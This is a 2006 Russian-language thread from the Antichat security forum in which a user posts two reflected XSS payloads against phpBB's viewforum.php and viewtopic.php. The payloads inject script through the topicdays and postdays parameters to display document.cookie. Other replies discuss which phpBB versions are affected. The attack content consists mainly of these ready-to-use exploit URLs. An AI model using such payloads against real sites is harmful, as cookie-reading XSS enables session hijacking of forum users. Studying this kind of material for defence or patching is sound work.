HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

2 xss в PHPBB
  #1  
Старый 21.09.2006, 19:34
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию 2 xss в PHPBB

2 xss увидел в viewforum.php и viewtopic.php

Код:
viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30
Код:
viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20
...
 
Ответить с цитированием

  #2  
Старый 21.09.2006, 19:45
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


По умолчанию

Хехе. Ради инетереса ты смотрел на какой версии тестировал + почему не написал в каких браузерах пашет а в каких нет? А так молодец! За старания свои + заслужил.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #3  
Старый 21.09.2006, 19:51
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

в эксплорере делал, а тестил на своём 2.0.6 форуме
 
Ответить с цитированием

  #4  
Старый 21.09.2006, 20:20
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
Сообщение от alextoun  
в эксплорере делал, а тестил на своём 2.0.6 форуме
phpBB 2.0.6: Выпущена в 2002 редкая версия.
А если phpBB 2.0.16
PHP код:
www.ut
 
Ответить с цитированием

  #5  
Старый 21.09.2006, 20:51
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию

Вообще-то уже 2.0.21 на дворе =)
 
Ответить с цитированием

  #6  
Старый 21.09.2006, 21:39
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

DIAgen извеняюсь 2.0.16, не увидел.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Уязвимости CMS / форумов 21 13.01.2007 23:01
Подборка уязвимостей phpBB -=ka$at1k=- Уязвимости CMS / форумов 3 02.07.2006 15:26
XSS, SQL-inj, PHP-inj и др. на примере phpBB pch Уязвимости 3 07.06.2006 15:26
Эксперимент с xss, на форуме phpBB virgoz Уязвимости CMS / форумов 3 31.10.2004 00:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.